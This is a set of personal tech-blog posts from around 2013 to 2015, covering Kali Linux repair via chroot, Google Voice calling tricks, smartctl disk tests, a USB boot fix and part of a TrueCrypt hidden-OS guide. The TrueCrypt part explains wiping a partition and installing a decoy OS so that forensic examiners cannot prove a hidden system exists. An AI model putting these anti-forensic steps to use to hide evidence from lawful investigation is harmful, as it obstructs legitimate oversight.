<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj39h3gSu4DMcgtvIVLhXxhLuc_BI0Zu83BXq2xX1wpkbXxM4gIRZ2dxZvxwbXGxxNzjQzVyYTq490oJGxDT1TgL07rhX2RwBIWQ1cyHskTpyks02RMJyK6u9382T_mHkQK9nPMxIJJ7dM/s1600/kali2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj39h3gSu4DMcgtvIVLhXxhLuc_BI0Zu83BXq2xX1wpkbXxM4gIRZ2dxZvxwbXGxxNzjQzVyYTq490oJGxDT1TgL07rhX2RwBIWQ1cyHskTpyks02RMJyK6u9382T_mHkQK9nPMxIJJ7dM/s320/kali2.png" width="320" /></a></div>
<br />
<br />
I've documented the steps I used to fix it, minus a few wrong turns I took. :) Hope this helps someone:<br />
<br />
<br />
<ol>
<li><a href="https://www.kali.org/downloads/" target="_blank">Download Kali Linux</a> in order to boot it live for the repair</li>
<li>Create bootable media from the ISO (I like <a href="http://www.pendrivelinux.com/yumi-multiboot-usb-creator/" target="_blank">YUMI</a>)</li>
<li>Boot the live Kali to the GUI</li>
<li>Run the command <i>df </i>from Terminal and leave the results up for now</li>
<li>Open Thunar, right click the HDD with the broken Kali install and choose mount</li>
<li>Type the encryption password (this gave me an error which I just ignored)</li>
<li>Right click the LVM and start the multidisk</li>
<li>Wait a moment and then right click again and mount it. Unfortunately, this mounts it read only. No worries...</li>
<li>Run <i>df</i> again in order to determine what was mounted and where. Compare the 2 <i>df</i> outputs.</li>
<li>Now unmount it with: <i>sudo umount /media/the-place-it-is-mounted</i></li>
<li>Create a new directory for mounting: <i>sudo mkdir /media/hdd</i></li>
<li>Mount it as read/write: <i>sudo mount -o rw /the/path /media/hdd</i> (Replace /the/path with the partition you are trying to mount. You can determine this by comparing the results from the 2 times you ran <i>df.</i>)</li>
<li>Use chroot to make the mounted filesystem be treated sorta like you booted into it directly: <i>chroot /media/hdd</i></li>
<li>Delete whatever you can to free up space</li>
<li>Clean up the tmp files: <i>rm -r /tmp/*</i></li>
<li>Exit chroot: <i>exit</i></li>
<li>Close Terminal</li>
<li>Go back to Thunar, unmount and stop the multidisk.</li>
<li>Reboot into the repaired Kali install!</li>
</ol>
<br />
Remember, always keep good backups!!<br />
<br />
<i>EDIT: <a href="https://twitter.com/blackMOREOps" target="_blank">@blackMOREOps</a> just reminded me of something...Don't forget to clean the Trash folder! I did this and forgot to document. Thanks <a href="http://www.blackmoreops.com/" target="_blank">@blackMOREOps</a>!</i><br />
<br />
<br />
<br />
<i><b>Repaired OS:</b> Kali Linux 1.0.6, 32 bit</i><br />
<i><b>Live OS:</b> Kali Linux 1.1.0a, 32 bit</i><br />
<i><br /></i>
<i><br /></i>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3627429161857795589.post-77913440104907099972015-06-30T01:02:00.000-05:002015-07-08T18:24:39.873-05:00A ProphesyI hereby prophesy that on July 8, 2015 Troy Hunt (@troyhunt) will tweet about a weird blog where a guy claims to have prophesied about the Hacking Team compromise. Troy's tweet will look something like this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs9x2H4gAtEwzpN9LWupACc7aTEHnCSShc83HRUapxFQ_19FWSxQb2XO6U2lsr81PbMOz3ji94670dO7yiU8-c2NL05DmA_HpPfNrGvtJe0tGNrsnabU8CmwLEBQVsxrhhKNYLHiICHyE/s1600/proph.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs9x2H4gAtEwzpN9LWupACc7aTEHnCSShc83HRUapxFQ_19FWSxQb2XO6U2lsr81PbMOz3ji94670dO7yiU8-c2NL05DmA_HpPfNrGvtJe0tGNrsnabU8CmwLEBQVsxrhhKNYLHiICHyE/s320/proph.png" width="320" /></a></div>
<br />
I will even predict the URL of his tweet:<br />
<br />
<a href="https://twitter.com/troyhunt/status/618909553892003840">https://twitter.com/troyhunt/status/618909553892003840</a><br />
<br />
You're welcome!Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3627429161857795589.post-79508785054911204332014-09-01T03:52:00.001-05:002014-09-01T04:14:32.764-05:00Make a Phablet With Free Out/Inbound VoIP Calls<p dir="ltr">I think we need one last Google Voice hack before Google potentially messes it up by moving it to Hangouts, don't ya think? Okay, how about turning your tablet into a phablet using Google Voice and Talkatone and having free calls in and out? What's a phablet? A hybrid between a tablet and a phone, of course! I just made my Android tablet a phablet by doing these simple steps:</p>
<p dir="ltr">1. Install the Google Voice app on the tablet<br>
2. Install the Talkatone app on the tablet<br>
3. Go to a web browser and add the Talkatone phone number to the Google Voice account</p>
<p dir="ltr">So where does the hacking come in? It's like this: Talktone only let's you receive calls for free, but not dial calls for free. Once your introductory free minutes are gone, you've gotta pay up in order to dial out. Unless you're me or you, that is! You see, we are going to call out by making the Google Voice app call IN to your Talkatone app. Wait, you mean one app will call the other app, all on the same device??? Yup!!!</p>
<p dir="ltr">When you need to dial out, just go to the Google Voice app and dial your friend's number but choose your Talkatone phone number in the dropdown menu. The next thing that will happen is that your Talkatone app will ring. Once you pick it up, it will start ringing your friend's number. Just like my previous Google Voice hack, we are basically dialing out by dialing in! Enjoy free unlimited outbound/inbound VoIP on your phantabulet!!!</p>
<div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPy4Te6Of_9YBtBwlVUbUQWs7gPiO6m07uqfwvt_JzZAlfCwFazMNnq9MTfhM6rwQZQRyW-Kl-3PGS1eJ7N85a1QgcJSzWrr_o0Vp5W4hmRdKILPjAlRt0LK01lpqXfPPEsnIvs42-JEE/s1600/Screenshot_2014-09-01-03-27-16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"> <img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPy4Te6Of_9YBtBwlVUbUQWs7gPiO6m07uqfwvt_JzZAlfCwFazMNnq9MTfhM6rwQZQRyW-Kl-3PGS1eJ7N85a1QgcJSzWrr_o0Vp5W4hmRdKILPjAlRt0LK01lpqXfPPEsnIvs42-JEE/s640/Screenshot_2014-09-01-03-27-16.png"> </a> </div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3627429161857795589.post-57480395012060332102014-08-07T01:38:00.000-05:002014-08-07T02:42:09.498-05:00Test HDD using smartctl and automate status<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlFd-Tyr91y02Qbgog8qE12vnMJUUWNOucA870qeLBbrefOR1d7WLHCN4jYEDb-ewKzNfYWhpbxjfqxLPNnAG5de6PWL6wEeRAb2pc7oUlv74UKrG5HwiTfGbeYyt8_oFpPGowu22nq5Y/s1600/smartctl3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlFd-Tyr91y02Qbgog8qE12vnMJUUWNOucA870qeLBbrefOR1d7WLHCN4jYEDb-ewKzNfYWhpbxjfqxLPNnAG5de6PWL6wEeRAb2pc7oUlv74UKrG5HwiTfGbeYyt8_oFpPGowu22nq5Y/s1600/smartctl3.png" width="400"></a></div>
<br>
<br>
I quite often test hard drives using various vendor specific live environments like SeaTools, etc. But what if you want to use a (live) Linux distro? This is quite doable with smartctl which is a part of smartmontools.<br>
<br>
Below are steps to do this, complete with a cool way to automate the status of the test appearing on the screen. Without automating the status, you will not receive any stdout notification unless you run a command manually. Remember, on some distros you will need to use sudo. Also, you will need to have smartmontools installed. If you don't know how to install it, there is plenty of info on Google on that. Keep in mind, some drives don't support SMART, which is lame.<br>
<br>
1. Start with looking at your disks to get the filename of the disk as it appears in /dev.<br>
<br>
<b>fdisk -l</b><br>
<br>
2. Once you've determined the disk you need to check, you can do a basic health status check. This is not authoritative but gives you a basic idea. Be sure to replace [sda] with your disk.<br>
<br>
<b>smartctl /dev/[sda] -H</b><br>
<br>
<br>
3. If you want to geek out on every last detail of the status/health of your disk which is currently available you can do that, too.<br>
<br>
<b>smartctl /dev/[sda] -a</b><br>
<br>
<br>
4. Okay, now it's time to start a test. You can run a short test or a long test, etc. but I always like to run a long test because it's more thorough.<br>
<br>
<b>smartctl /dev/[sda] --test=long</b><br>
<br>
<br>
5. Smartctl has one downside. It doesn't show you a status of the test running in the background unless you run smartctl -a and find the result within that information. To make things easier, I've provided a way to automate the status of the test so that it scrolls down the screen showing the percent complete. It will also display "...completed" when it is finished.<br>
<br>
<b>watch -n 1 smartctl /dev/[sda] -a | grep 'execution\|remaining'</b><br>
<br>
(Note the backslash followed by a pipe for OR.)<br>
<br>
<br>
6. When the test is complete, you will still need to manually check the result of the test to see if there were errors.<br>
<br>
<b>smartctl /dev/[sda] -a</b><br>
<br>
7. Near the bottom of the output will be a section that begins with: "SMART Self-test log structure revision number..." Right below that, you will see the result of recent tests with the most recent (yours) listed first. The status will be shown, including the LBA of the first error, if there are any.<br>
<br>
8. Here are a couple of other useful commands...<br>
<br>
Help (useful in live Linux distros that do not contain man pages): <b>smartctl -h</b><br>
<br>
Abort a test that is currently running: <b>smartctl /dev/[sda] -X</b><br>
<br>
<br>
Enjoy!<br>
<br>
If this helped you, consider leaving a comment and saying hello!<br>
<br>
<br>
<br>
<i>Tested on...</i><br>
<i>smartctl: 6.0 2012-10-10 r3643</i><br>
<i>OS: AVG 2013-08-01 from live USB drive</i><br>
<br>
<br>
<br>
<br>
<br>
<br>
<!-- Blogger automated replacement: "https://images-blogger-opensocial.googleusercontent.com/gadgets/proxy?url=http%3A%2F%2F2.bp.blogspot.com%2F-_shR2VicLq0%2FU-MXQm4BX0I%2FAAAAAAAACHs%2FJpTnViuBzdA%2Fs1600%2Fsmartctl3.png&container=blogger&gadget=a&rewriteMime=image%2F*" with "https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlFd-Tyr91y02Qbgog8qE12vnMJUUWNOucA870qeLBbrefOR1d7WLHCN4jYEDb-ewKzNfYWhpbxjfqxLPNnAG5de6PWL6wEeRAb2pc7oUlv74UKrG5HwiTfGbeYyt8_oFpPGowu22nq5Y/s1600/smartctl3.png" -->Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3627429161857795589.post-56930234978333217792014-07-22T13:43:00.002-05:002014-07-22T13:43:48.921-05:00Hack your DSL line to get phone service<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY9Ui1HyYTxUzYsIhcFcTrQhkQeRFLDjnI4K6mu-GnA2rFNm8o7gcle2-KvYPqIpfUE46NQKCJ_cgFpQDRyxmL6sFXbshittpZcCK8Wu_J3YrhzbW5LXwWMU6d7XpmQG4gE2zzxE5Wa6U/s1600/buttset.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY9Ui1HyYTxUzYsIhcFcTrQhkQeRFLDjnI4K6mu-GnA2rFNm8o7gcle2-KvYPqIpfUE46NQKCJ_cgFpQDRyxmL6sFXbshittpZcCK8Wu_J3YrhzbW5LXwWMU6d7XpmQG4gE2zzxE5Wa6U/s1600/buttset.jpg" /></a></div>
<br />
When my ISP installed my DSL only service (no phone), the technician tested the line for a dial tone with a buttset. This got me thinking. I asked the technician why there was a dial tone if it was a dry loop with DSL only. He said that there is indeed a dial tone but that you can only dial 911 or receive calls. He said you can't call out to anything besides 911. I said to myself, "Wanna bet?"<br />
<br />
I hacked it in under 5 minutes. Now I can call in and out, including free long distance. No, I didn't violate any laws or do anything highly technical. I just setup Google Voice! This saves me $20 a month. Now I'm not saying this will work with your DSL provider, but it did for mine so I thought I'd share.<br />
<br />
Here's what I did:<br />
<br />
1. Retrieved the phone number for my DSL service (this was provided to me when I signed up)<br />
2. Added the phone to my existing Google Voice account with Gear icon>Settings>Phones>Add another phone<br />
3. When Google Voice asked to verify my phone, I chose voice verification. My old POTS line phone rang and I typed in the 2 digit verification code.<br />
<br />
That's it!<br />
<br />
<b>How dialing in works:</b> If you dial my Google Voice number, it rings my home phone.<br />
<br />
<b>How dialing out works: </b>Well, it's admittedly a bit clunky but I browse to voice.google.com, click call, put in the number, choose the "Phone to call with" and wait for it to ring. Once I pick up the phone, it connects me to the number I dialed from my browser. I can also do this from my Android device using the Google Voice app.<br />
<br />
The beauty of this hack is that it dials out by dialing in. :)<br />
<br />
Why have a home phone in the cell phone age? Well, cell phones are awesome but they run out of battery, get lost or damaged, etc. My home phone is powered by the phone line and sits there reliably on a shelf for when it is needed. Nice to have options.<br />
<br />
Hope this helps someone save some money. Don't forget your DSL filter! If this helped you, leave me a quick comment.Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-3627429161857795589.post-33469519074091327602014-04-28T01:22:00.000-05:002014-04-28T02:26:37.679-05:00Make UBCD's Parted Magic boot from a USB drive<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbC8Q0ZOgVFAHDnzbyqe83EVz64kgKnRtf2TXGvTlOKKTWmnotaZpgNKCBx1k-WF9LG5PLx5xzkEfvz0w500kNUVeRysWkBoINF3cQv67cvy838agN9LI9X9tjXRZedG6Xros8rJvbFsM/s1600/ubcd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbC8Q0ZOgVFAHDnzbyqe83EVz64kgKnRtf2TXGvTlOKKTWmnotaZpgNKCBx1k-WF9LG5PLx5xzkEfvz0w500kNUVeRysWkBoINF3cQv67cvy838agN9LI9X9tjXRZedG6Xros8rJvbFsM/s1600/ubcd.png" height="221" width="400" /></a></div>
<br />
<br />
I love <a href="http://www.ultimatebootcd.com/">UBCD</a>. It's a bootable CD with tools to do everything from securely shred hard drives to modify Windows registry from Linux. I also love <a href="http://www.pendrivelinux.com/yumi-multiboot-usb-creator/">YUMI</a>. It allows you to create a bootable USB flash drive with multiple operating systems on it and even has support for adding or removing specific distros without killing your whole setup.<br />
<br />
One problem. If you use YUMI to create a bootable USB drive with UBCD on it, the bundled version of Parted Magic will not boot. Parted Magic is really awesome for rescuing systems, etc. so I was disappointed about this. I checked my md5sum and it was good but when booting from my USB drive it would complain that it couldn't find the sqfs. When I burned the very same ISO to a CD, Parted Magic worked fine, though!<br />
<br />
After not finding the information on Google and banging my head against a wall for a while, I was able to figure it out. Here's what I did:<br />
<br />
1. Download <a href="http://www.pendrivelinux.com/yumi-multiboot-usb-creator/">YUMI</a> and <a href="http://www.ultimatebootcd.com/download.html">UBCD</a> and use YUMI to add UBCD to the USB drive. If you need help with that part, there's lots of info on Google.<br />
<br />
2. Extract your downloaded UBCD ISO. There is lots of info on Google on how to extract an ISO, also.<br />
<br />
3. Once you've extracted your ISO, look for the pmagic folder and copy it to the root of your USB flash drive.<br />
<br />
That's it! Pretty easy but was a bit of a headache to figure out! Hope this post helps you! If so, please comment and say hello. I try to respond to as many comments as possible.<br />
<br />
By the way, if you use <a href="http://www.winehq.org/about/">WINE</a> to run YUMI from Linux as I did, beware that YUMI cannot format the drive even if you use sudo. The only way I was able to use it from Linux (Kali) was to use a USB drive that already had YUMI on it (which I installed from a Windows box a while ago). In other words, you can only <i>modify</i> your existing YUMI install from WINE, you can't do the initial YUMI install. If anybody finds a way around this, please comment below and let me know! Also, don't forget you'll have to use winecfg to <a href="http://askubuntu.com/questions/314205/how-to-mount-usb-flash-drive-to-wine">connect WINE to your USB drive</a>.<br />
<br />
Happy hacking!<br />
<br />
<br />
<b><i>Tested on:</i></b><br />
<i>Kali Linux 1.0</i><br />
<i>SanDisk 16GB USB flash drive</i><br />
<i>VirtualBox 4.3.10 r93012 (using <a href="http://www.metashock.de/2012/11/booting-your-usb-stick-using-virtual-box-on-a-linux-host/">raw disk hack</a> to boot to USB drive)</i><br />
<i>wine-1.4.1</i><br />
<i>YUMI-2.0.0.3</i><br />
<i>Ultimate Boot CD V5.2.9</i><br />
<i>PMAGIC_2013_08_01</i><br />
<i><br /></i>
<i><br /></i>
<i><br /></i>Unknownnoreply@blogger.com9tag:blogger.com,1999:blog-3627429161857795589.post-19277080816730485662013-09-07T20:37:00.001-05:002013-09-07T23:38:58.994-05:00Plausible deniability of a hidden OS - Part 3This is Part 3 of a 4 part post on using TrueCrypt to create a hidden operating system.<br />
<br />
Links to each section:<br />
<a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part.html">Part 1</a> - (Un)boring intro with all the snazzy info<br />
<a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part-2.html">Part 2</a> - Setup your second partition<br />
Part 3 - Setup your first partition (sounds backwards, I know) -- you are here<br />
Part 4 - Other cool stuff -- COMING SOON<br />
<br />
<br />
<span style="font-size: large;">Part <span style="font-size: large;">3</span> - Setup your first partition</span><br />
<br />
<br />
~So
now that you have copied your operating system from Partition 1 to the
inner volume of Partition 2 we need to securely wipe the contents of
Partition 1. Otherwise, even if you reinstall Windows on Partition 1,
someone with forensic capabilities may be able to recover the previous
Windows installation Partition 1 and thereby build a case that you have a
hidden operating system, etc.<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqG8dHwfJXdnlRNOkeRTT2wS20260xRF3FQkLo8DeafQCF-pPiXjBqIbhbLeYySJJaADLl1iQMe1vlLziLiNlp9ZzU857-14gGnIT5ijiE-Y7qq5mQbjsRhchQ4TVfyfBW8mvdJT7RIsM/s1600/031.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqG8dHwfJXdnlRNOkeRTT2wS20260xRF3FQkLo8DeafQCF-pPiXjBqIbhbLeYySJJaADLl1iQMe1vlLziLiNlp9ZzU857-14gGnIT5ijiE-Y7qq5mQbjsRhchQ4TVfyfBW8mvdJT7RIsM/s400/031.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Using
the default Department of Defense standard of 3 passes of random ones
and zeros for wiping is quite adequate in my opinion. For utter
paranoia, try additional passes -- though that could put your wipe time
at days or weeks!... </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK4PB1OrOWULrJx6Rvulj6KEb5dwOzgINVtImk70zjyuYMzFZad5ZRSJN3oNX9tNUKIwHoHj2eTv_4YeYCH126lOb4isYBoNiw2KqbnZ4XmNpSBIDIUTd6ykOD1sJQZ_YNvoPvyIfoiUs/s1600/032.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK4PB1OrOWULrJx6Rvulj6KEb5dwOzgINVtImk70zjyuYMzFZad5ZRSJN3oNX9tNUKIwHoHj2eTv_4YeYCH126lOb4isYBoNiw2KqbnZ4XmNpSBIDIUTd6ykOD1sJQZ_YNvoPvyIfoiUs/s400/032.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Click Wipe:</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYoR2hOA6shDEC09gOhhOG03xMC7l9qhbIgmB5OQ3f667UK68qURI5ftiRzm83lNKGr02-Zn2OZMa7PwpRCAMImziqV5FRcr2TMefcwZ3AlXTWsQV76Hq3yMmw-ruvqb2nVyn023AtqVg/s1600/033.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYoR2hOA6shDEC09gOhhOG03xMC7l9qhbIgmB5OQ3f667UK68qURI5ftiRzm83lNKGr02-Zn2OZMa7PwpRCAMImziqV5FRcr2TMefcwZ3AlXTWsQV76Hq3yMmw-ruvqb2nVyn023AtqVg/s400/033.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Click OK here: </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgONuXHD4pZUXXmIjWBgbLAK8diCPP9fvZyGH_k7D0AysO4Wp5ZsVE9I4Oysjq9uRHdcFaQCkAff444w1TnKl3q-he5txP16OWReK59pEy19k_Pj3UcBji87hxNxAO2zk2zQ3igTYVAbmk/s1600/034.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgONuXHD4pZUXXmIjWBgbLAK8diCPP9fvZyGH_k7D0AysO4Wp5ZsVE9I4Oysjq9uRHdcFaQCkAff444w1TnKl3q-he5txP16OWReK59pEy19k_Pj3UcBji87hxNxAO2zk2zQ3igTYVAbmk/s400/034.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~More mouse fun! The more you move your mouse, the more securely and randomly Partition 1 will be wiped! </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj25dORTxyKwurWDa8KtfACX-uCSYSztfStpzLrlmfmJ2Prb3GHwpL7WIyAJnRYgC6EKZW8Pi-c5k7TKdVRbO4GCvp4ZRWWdvW9xZBUhSBmw41LAqosDWSkin3FeiFkcVRwgg3hE8tZoSg/s1600/035.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="398" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj25dORTxyKwurWDa8KtfACX-uCSYSztfStpzLrlmfmJ2Prb3GHwpL7WIyAJnRYgC6EKZW8Pi-c5k7TKdVRbO4GCvp4ZRWWdvW9xZBUhSBmw41LAqosDWSkin3FeiFkcVRwgg3hE8tZoSg/s400/035.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Wiping
in some cases can take all day/night, even at 3 passes. Other factors
of course include the size and speed of your drive. </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisWvb1UfEnNJHb3tRxDxJUHq9mIyT_CyJpBBW4zBy7TEoaeC8AMZoVMk6d6dMSSqEI4IQymwwu_nT6H0JW36RvZiZSd27ezWmhuxf6Wp5YkdsznDRpcnKlRWkhCGGkDDE0yYJg6zWqHjw/s1600/036.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisWvb1UfEnNJHb3tRxDxJUHq9mIyT_CyJpBBW4zBy7TEoaeC8AMZoVMk6d6dMSSqEI4IQymwwu_nT6H0JW36RvZiZSd27ezWmhuxf6Wp5YkdsznDRpcnKlRWkhCGGkDDE0yYJg6zWqHjw/s400/036.png" width="400" /></a></div>
<br />
~Here is the success dialog: <br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHc5l1iwaQAT2oLWzwr4mMj7MQ2_CJCoKGZh-sz9PqC_wAt0wfGWpGTSZWH9djHOuvSBtsDch1wksoiJIdKfUUMz06lps5rIRaQ2KyoYiboR3uAQij0rQ68M124b8QwhbZ6kg-1M_awwk/s1600/037.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHc5l1iwaQAT2oLWzwr4mMj7MQ2_CJCoKGZh-sz9PqC_wAt0wfGWpGTSZWH9djHOuvSBtsDch1wksoiJIdKfUUMz06lps5rIRaQ2KyoYiboR3uAQij0rQ68M124b8QwhbZ6kg-1M_awwk/s400/037.png" width="400" /></a></div>
<br />
~Click Exit:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-707ELoT6OIZabCu_7sBG3ZPHJ3s9FF8vb1aPoCZZISee-B6VyxCoWqhv2QkUCu4xR6asgdR4FG61qNZfi6-2swJdsBMjMHyZo1kOYC1B6OJjEXYdHIZ4_pjkV4FHllBV-PrYwFQLmq8/s1600/038.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-707ELoT6OIZabCu_7sBG3ZPHJ3s9FF8vb1aPoCZZISee-B6VyxCoWqhv2QkUCu4xR6asgdR4FG61qNZfi6-2swJdsBMjMHyZo1kOYC1B6OJjEXYdHIZ4_pjkV4FHllBV-PrYwFQLmq8/s400/038.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~So
now it is time to go ahead and install a fresh copy of Windows on
Partition 1 as a decoy operating system. Just pop a Windows disc in
there and install on Partition 1. (Don't accidentally install onto or
delete Partition 2!!) Once that's done, download TrueCrypt onto the
fresh decoy install and choose Create Volume. Then choose Normal since
this will be the decoy installation and press Next: </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi1QVduCww2aOzHFZoXiI0LyYy8hZ2f5MA7lS31B3xuOJb3sRCbhAnNrpvOGQ9eWx4RstYxKHPmvgsX4B23N9PWU_EU86t-dR85cxEyj13SAbrdLPZutkp76Fap5Jc10z-pMuP2qoXMVw/s1600/039.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi1QVduCww2aOzHFZoXiI0LyYy8hZ2f5MA7lS31B3xuOJb3sRCbhAnNrpvOGQ9eWx4RstYxKHPmvgsX4B23N9PWU_EU86t-dR85cxEyj13SAbrdLPZutkp76Fap5Jc10z-pMuP2qoXMVw/s400/039.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Choose Encrypt the Windows system partition... </div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCDm7gHFHyBhkotP8xOzlyLiE0j5jqm9GHABLxdJQqN4l-ctg3AmsEs8RndwCM9KNx3BCPtUjlOr-icEdxblwn8lQVXkVpjWWycH0EBXIStEPEFVBXSIdFbsLsM3TXOfqeTgJBRJFFhmc/s1600/040.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCDm7gHFHyBhkotP8xOzlyLiE0j5jqm9GHABLxdJQqN4l-ctg3AmsEs8RndwCM9KNx3BCPtUjlOr-icEdxblwn8lQVXkVpjWWycH0EBXIStEPEFVBXSIdFbsLsM3TXOfqeTgJBRJFFhmc/s400/040.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Choose Single-boot</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3I2V7DbiLt_Qtje0he-MKw6VIycwLI5MaCUZVeGLdCkWYhIi0hP7LSV0tOLmOhVQ57F9Bz1HPGpPhHtk-Qerds-BmU5X_1Sl1V7G2jF47nR_5hW7CsCG9KKiQu1BO6F_ls_QWgsdT7qo/s1600/041.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3I2V7DbiLt_Qtje0he-MKw6VIycwLI5MaCUZVeGLdCkWYhIi0hP7LSV0tOLmOhVQ57F9Bz1HPGpPhHtk-Qerds-BmU5X_1Sl1V7G2jF47nR_5hW7CsCG9KKiQu1BO6F_ls_QWgsdT7qo/s400/041.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~<span style="color: red;"><b>Make
sure you select the same encryption algorithm here that you did when
you created the inner volume on Partition 2.</b></span> They must be the same
because both the decoy and hidden operating systems use the same
bootloader and there is a different bootloader for each algorithm.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
